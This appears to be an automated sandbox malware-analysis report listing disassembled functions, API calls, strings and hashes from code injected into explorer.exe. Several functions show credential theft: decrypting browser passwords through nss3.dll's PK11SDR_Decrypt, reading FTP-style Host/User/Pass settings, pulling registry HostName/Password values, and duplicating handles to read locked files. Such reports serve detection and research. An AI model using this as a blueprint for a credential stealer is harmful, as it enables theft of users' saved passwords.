OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00C337A8), ref: 00C334E9

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00C3351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00C33541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00C33586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 00C3358F
lstrcmpiW.KERNEL32(00000000,File), ref: 00C335B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 00C335DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00C335F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00C33606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 00C3361E
GetFileSize.KERNEL32(?,00000000), ref: 00C33631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00C33658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00C3366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C33681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00C336AD
CloseHandle.KERNEL32(?), ref: 00C336C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00C337A8), ref: 00C336F5

Part of subcall function 00C31C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C31CC0
Part of subcall function 00C31C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C31CDA
Part of subcall function 00C31C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C31CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00C337A8), ref: 00C33707

Strings

File, xrefs: 00C335B0

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 6f8e1b7f16321121bf35b92997e3f037675bf4e92309fb0bcbb35c2010e952e2
Instruction ID: 8fbd49142ec01e844d39ef3c87c5a0e21f0b8c70e7ff5c2211cec4cd09245046
Opcode Fuzzy Hash: 6f8e1b7f16321121bf35b92997e3f037675bf4e92309fb0bcbb35c2010e952e2
Instruction Fuzzy Hash: 6F61BD70214340BFD720AF21CC89F2FBBE9FB88754F00082CF956962A2DB75DA449B59

Function 00C84438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00C84502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 00C8475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00C84803

Strings

invalid uri authority: %.*s, xrefs: 00C84513
file, xrefs: 00C84474
access, xrefs: 00C84725
no such vfs: %s, xrefs: 00C8482F
%s mode not allowed: %s, xrefs: 00C847D0
mode, xrefs: 00C84712
cach, xrefs: 00C846DC
cache, xrefs: 00C846FA
localhost, xrefs: 00C844FD
no such %s mode: %s, xrefs: 00C84784

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: 4d5249d2cf9e89e47833c2a3f5195957ecd89bce14a613af37dce9ba7b66d52c
Instruction ID: f6466aa289baf947cb51f5ea7b1817ec0d43348252822d44b5be3a079fcbfae3
Opcode Fuzzy Hash: 4d5249d2cf9e89e47833c2a3f5195957ecd89bce14a613af37dce9ba7b66d52c
Instruction Fuzzy Hash: 16C1E170A083539BDB38EF18849176BB7E1AB9A31CF14052EF4E587281E734DE45CB5A

Function 00C55F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 00C36AAA: memset.NTDLL ref: 00C36AC5

memset.NTDLL ref: 00C55F53

Strings

indexed, xrefs: 00C560E8
cannot open table without rowid: %s, xrefs: 00C55FCF
no such column: "%s", xrefs: 00C56271
foreign key, xrefs: 00C560A3
cannot open %s column for writing, xrefs: 00C56255
cannot open virtual table: %s, xrefs: 00C55FAA
cannot open view: %s, xrefs: 00C55FF3

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: b846fe53317e8534a3a2efa1b2b2b231b4517d24b94d24b340d30adaa75b08ba
Instruction ID: 8986bd9b8240af5c1880fb3d1362b83f7e747e4f09cdf5bb6b6677d93141c181
Opcode Fuzzy Hash: b846fe53317e8534a3a2efa1b2b2b231b4517d24b94d24b340d30adaa75b08ba
Instruction Fuzzy Hash: C3C1AE74604701AFCB14DF25C880A2EB7E2BFC8715F44892DF85587282DB31D99ADB9A

Function 00C34440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(00C862B0,00000000,00000001,00C862A0,?), ref: 00C3445F
SysAllocString.OLEAUT32(?), ref: 00C344AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 00C3456E
lstrcmpiW.KERNEL32(Servers,?), ref: 00C3457D
lstrcmpiW.KERNEL32(Settings,?), ref: 00C3458C

Part of subcall function 00C311E1: lstrlenW.KERNEL32(?,7556F360,00000000,?,00000000,?,00C346E3), ref: 00C311ED
Part of subcall function 00C311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00C3120F
Part of subcall function 00C311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00C31231

lstrcmpiW.KERNEL32(Server,?), ref: 00C345BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 00C345CD
lstrcmpiW.KERNEL32(Host,?), ref: 00C34657
lstrcmpiW.KERNEL32(Port,?), ref: 00C34679
lstrcmpiW.KERNEL32(User,?), ref: 00C3469F
lstrcmpiW.KERNEL32(Pass,?), ref: 00C346C5
wsprintfW.USER32 ref: 00C3471E

Strings

Servers, xrefs: 00C34578
Host, xrefs: 00C34652
Server, xrefs: 00C345B9
LastServer, xrefs: 00C345C8
RecentServers, xrefs: 00C34569
Pass, xrefs: 00C346C0
Port, xrefs: 00C34674
User, xrefs: 00C3469A
%s:%s, xrefs: 00C34718
Settings, xrefs: 00C34587

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: 9b808cb691727767c1cbb76b491d6b711eae6c3df2bc8fbed7d19edabb14b1fc
Instruction ID: 887e3859253278db2b7d8c48c706a40b83e6c7dd8d7917843c2eaabf89a03e1e
Opcode Fuzzy Hash: 9b808cb691727767c1cbb76b491d6b711eae6c3df2bc8fbed7d19edabb14b1fc
Instruction Fuzzy Hash: 42B10871204302AFD704DF64C884E6AB7F9EFCA759F00896CF5958B260DB71E946CB62

Function 00C324B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

Part of subcall function 00C31090: lstrlenW.KERNEL32(?,?,00000000,00C317E5), ref: 00C31097
Part of subcall function 00C31090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00C310A8

Part of subcall function 00C319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C319C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00C32503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 00C3250A
LoadLibraryW.KERNEL32(00000000), ref: 00C32563
SetCurrentDirectoryW.KERNEL32(?), ref: 00C32570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00C32591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 00C3259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 00C325AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00C325B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00C325C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00C325D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 00C325DF

Part of subcall function 00C3190B: lstrlen.KERNEL32(?,?,?,?,00000000,00C32783), ref: 00C3192B
Part of subcall function 00C3190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00C32783), ref: 00C31930
Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,?), ref: 00C31946
Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,00000000), ref: 00C3194A

Strings

PK11SDR_Decrypt, xrefs: 00C325C7
nss3.dll, xrefs: 00C32510
NSS_Shutdown, xrefs: 00C32593
PK11_FreeSlot, xrefs: 00C325D4
PK11_Authenticate, xrefs: 00C325BA
PK11_GetInternalKeySlot, xrefs: 00C325AD
sql:, xrefs: 00C3262B
SECITEM_FreeItem, xrefs: 00C325A0
NSS_Init, xrefs: 00C3258B

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: 4db564ff01ca26e3e43ec7c70afe483de24d6bedca2c4122eac9c22c501cb572
Instruction ID: 81e3ac56d50ab936e21bf406e08ba9a50964dcee30917c6852dc77d2803b359b
Opcode Fuzzy Hash: 4db564ff01ca26e3e43ec7c70afe483de24d6bedca2c4122eac9c22c501cb572
Instruction Fuzzy Hash: C5412231A1031A8FCF14AFB59C5A76E7AE59F85B44F08003EFC5297262DB348D019B99

Function 00C35E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 00C35BF5: memset.NTDLL ref: 00C35C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 00C360E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 00C360EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 00C36113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 00C3618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 00C361B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 00C361C1

Strings

%lld, xrefs: 00C36122
%03d, xrefs: 00C361F3
%04d, xrefs: 00C36016
%.16g, xrefs: 00C36077
%06.3f, xrefs: 00C36229
%02d, xrefs: 00C36039, 00C361D3
W, xrefs: 00C36193

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: b96c07b64fd57a05e1a00bb2d04e7ef2406a8e9cd9166bf9731ca16b7d9aabe9
Instruction ID: 84c1242b977ccdaa18dc2e04de5450178ea62dc4c1552801ad1d089305f817d9
Opcode Fuzzy Hash: b96c07b64fd57a05e1a00bb2d04e7ef2406a8e9cd9166bf9731ca16b7d9aabe9
Instruction Fuzzy Hash: EEB1AFB1918742BBD735AE24CC85B3B7FD4FB84304F254A5DF492A61D1EA22CE108799

Function 00C4D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(00C8637A,BINARY,00000007), ref: 00C4D324

Strings

%lld, xrefs: 00C4D3CA
BINARY, xrefs: 00C4D31E
,%s%s, xrefs: 00C4D34E
k(%d, xrefs: 00C4D2EE
%s(%d), xrefs: 00C4D3AB
%.16g, xrefs: 00C4D3E5
program, xrefs: 00C4D46A
,%d, xrefs: 00C4D444
vtab:%p, xrefs: 00C4D423
(%.20s), xrefs: 00C4D38A
NULL, xrefs: 00C4D40F
(blob), xrefs: 00C4D416

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: db9286a019a545088d2d98baeb536a1480c298dbad51eee24c1537c7669329cf
Instruction ID: 76ec5bd41fc49c40f96b6e965a9cc09892d33e2918c89809895d0537e06a0382
Opcode Fuzzy Hash: db9286a019a545088d2d98baeb536a1480c298dbad51eee24c1537c7669329cf
Instruction Fuzzy Hash: B9512071608300ABDB20FF65CC41A6AB3F5BF49704F540969F8938B261E770ED09DB96

Function 00C348B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00C319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
Part of subcall function 00C319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98

Part of subcall function 00C3482C: lstrlenW.KERNEL32(?), ref: 00C34845
Part of subcall function 00C3482C: lstrlenW.KERNEL32(?), ref: 00C3488F
Part of subcall function 00C3482C: lstrlenW.KERNEL32(?), ref: 00C34897

wsprintfW.USER32 ref: 00C349A7
wsprintfW.USER32 ref: 00C349B9

Strings

UserName, xrefs: 00C348D2
RemoteDirectory, xrefs: 00C348F8
%s:%u, xrefs: 00C34971, 00C349B7
%s:%u/%s, xrefs: 00C34982, 00C349A5
Password, xrefs: 00C348E4
HostName, xrefs: 00C348C4

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: bee3696176a8804893960b96647711cd12ed1c4c6c8c3d220b23b91392c0b399
Instruction ID: 6e82d516350db55d76c9b9d18e48ff2fd7e33e99b3c764f7ffbb7a15e541f205
Opcode Fuzzy Hash: bee3696176a8804893960b96647711cd12ed1c4c6c8c3d220b23b91392c0b399
Instruction Fuzzy Hash: 5C3122307203046BC718BBA5CC05F2FB6EDEFC9788F09491DB44187281DAB2ED4187A1

Function 00C3F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 00C3FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00C3FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00C3FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 00C3FB95

Strings

nolock, xrefs: 00C3FC4E
immutable, xrefs: 00C3FC68
-journal, xrefs: 00C3FB6B
-wal, xrefs: 00C3FBA9

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 779f80ea5ab52e348ae1a182b3283ec163b462419dcc0bb04fe764faf8378b6f
Instruction ID: 1cf14acd85c3288f0c993ee16c1bb83560b441ae735ab0a4a2572ebf7324cfaf
Opcode Fuzzy Hash: 779f80ea5ab52e348ae1a182b3283ec163b462419dcc0bb04fe764faf8378b6f
Instruction Fuzzy Hash: 75D1E7B1A183419FC714DF24C881B1ABBE1AF95314F08497DFC998B392DB75D905CB62

Function 00C37820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

-x0, xrefs: 00C37325
NaN, xrefs: 00C373F8
%, xrefs: 00C37822

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: 18ea6547e41a2ac3fc37b27c86ce80245ab42f2a43365b6fcc108535493afbc6
Instruction ID: f4cda12ea1f81a74b685643f38ac0cce6df6dbeda1448281b1ece7bb80229a93
Opcode Fuzzy Hash: 18ea6547e41a2ac3fc37b27c86ce80245ab42f2a43365b6fcc108535493afbc6
Instruction Fuzzy Hash: 7BD103B062C3829BD7358F29849437FBFE1AF99304F284A5DF8D187351D664CA45EB82

Function 00C378B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

-x0, xrefs: 00C37325
NaN, xrefs: 00C373F8

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 1b7f68a6ad505f2e4e6e8004fbdb5857aebaa575b62226f1c1176d5cae223147
Instruction ID: 66a803ecb30662187fe4e7eacba388dfc2bac4cafe4e0a3241bf16624a1078ae
Opcode Fuzzy Hash: 1b7f68a6ad505f2e4e6e8004fbdb5857aebaa575b62226f1c1176d5cae223147
Instruction Fuzzy Hash: DEE134B062C3829BD7358E29C49437FBBE1AF89304F284A5DF8D287351D660CE45E782

Function 00C37A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

-x0, xrefs: 00C37325
NaN, xrefs: 00C373F8

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: fe3414a1215ce5daeccc9028f7a1fd0b61c05160316d70c0a15c08eaffa66340
Instruction ID: 6b9d23070f70979a9f5f7bbb9ac41bb2b4d976c1b17d49a2d14888b1781d3156
Opcode Fuzzy Hash: fe3414a1215ce5daeccc9028f7a1fd0b61c05160316d70c0a15c08eaffa66340
Instruction Fuzzy Hash: 57E101B062C3829BD7358F29C49072FBBE1AF9A304F248A5DF8D187351D664CE45DB82

Function 00C37A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

-x0, xrefs: 00C37325
NaN, xrefs: 00C373F8

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 5b83757daad9a8fe174f49d45c508761db2ef2573b5099dbce6289432b5e0423
Instruction ID: 51e3d2244c4e1d7f21f6a86bad9bd96c92154ba636d7bc2210d85b2492b8627b
Opcode Fuzzy Hash: 5b83757daad9a8fe174f49d45c508761db2ef2573b5099dbce6289432b5e0423
Instruction Fuzzy Hash: 97E124B062C3829BD7358F29C49432FBBE1AF99304F248A5DF8D187351D674CA45DB82

Function 00C377F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

-x0, xrefs: 00C37325
NaN, xrefs: 00C373F8

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 8a79daab14c56ec0a0807deb029325bd031088bcf89cccc0328d594593f49e86
Instruction ID: c29642700f8b78ef7da80000b6ff7b1b824fba503cfa0a4368b5c509a2802b76
Opcode Fuzzy Hash: 8a79daab14c56ec0a0807deb029325bd031088bcf89cccc0328d594593f49e86
Instruction Fuzzy Hash: DAE112B062C3829FD7358F29C49472FBBE1AF99304F244A5DF8D187351D664CA45DB42

Function 00C370C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 00C3720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00C37226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 00C3727B

Strings

-x0, xrefs: 00C37325
NaN, xrefs: 00C373F8

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: fd4c173f6f79fb435272a824674e845efe2e8b241a6d47b085890ff3a3f3216d
Instruction ID: 7f2b67310a2373960cff2cb46b3f87db9117022202305fa4290c356a7013457d
Opcode Fuzzy Hash: fd4c173f6f79fb435272a824674e845efe2e8b241a6d47b085890ff3a3f3216d
Instruction Fuzzy Hash: F9D103B062C3829BD7358F29849437FBFE1AF99304F284A5DF8D187351D664CA45DB82

Function 00C3898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00C38AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 00C38B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00C38C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00C38CAE

Strings

., xrefs: 00C38B17

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: 64f9232be394405045f481b5336b2272a04692f9f38458a5cb760d89cdbe852f
Instruction ID: ba39ec4997d91defcb2119e882d22527b1f5e45e11e667fa10902bb0971752e1
Opcode Fuzzy Hash: 64f9232be394405045f481b5336b2272a04692f9f38458a5cb760d89cdbe852f
Instruction Fuzzy Hash: 32D115B191C7858BC720DF59988033EFBF0BBD5714F04095EF6D596281DBB1CA4A8B86

Function 00C5D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C5D6A0
memset.NTDLL ref: 00C5D6B3
memset.NTDLL ref: 00C5D6C3

Strings

7, xrefs: 00C5D71B
,, xrefs: 00C5D6FC
9, xrefs: 00C5D701

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 1fbe731c2eec562a58757fbaeaf99cefc02bea031903d696101fc2459c5a4237
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: 03314B715083449FD730DF64D880B8FBBE9AF85384F00892EF98997251EB71964DCBA6

Function 00C31BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BCC
StrStrIW.SHLWAPI(00000000,.exe,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C05
lstrlenW.KERNEL32(00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C1C

Strings

.exe, xrefs: 00C31BEA

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: d6ba7e95acf3b1ce1ed5ea700672571d8ce629f019554eb2e5420cc5c5f86c24
Instruction ID: 18b03f2188d973f527e13184179e3d5a05bb6addeee822cafc516f372df21e1d
Opcode Fuzzy Hash: d6ba7e95acf3b1ce1ed5ea700672571d8ce629f019554eb2e5420cc5c5f86c24
Instruction Fuzzy Hash: 19F062313602219FD7246F34AC49BBF62A4EF05351F18586AE946D31A1EB608E41C79D

Function 00C32112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C32127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 00C3213A
wsprintfA.USER32 ref: 00C3214F

Strings

%li, xrefs: 00C32149

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: 3cdf3ab9c7e35303298b7cc0431a55cd3f0b963aec123e9a9ddf5212d6292e97
Instruction ID: 6e1617e5b4f4b54f6a95673da654f58e29c941b21705617ab65e13bae652ca64
Opcode Fuzzy Hash: 3cdf3ab9c7e35303298b7cc0431a55cd3f0b963aec123e9a9ddf5212d6292e97
Instruction Fuzzy Hash: FFE0D8326402087BC7203BB89C0AFEF7B6CDB40B19F044191F900F6182E5724A2493D9

Function 00C42FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 00C4316F
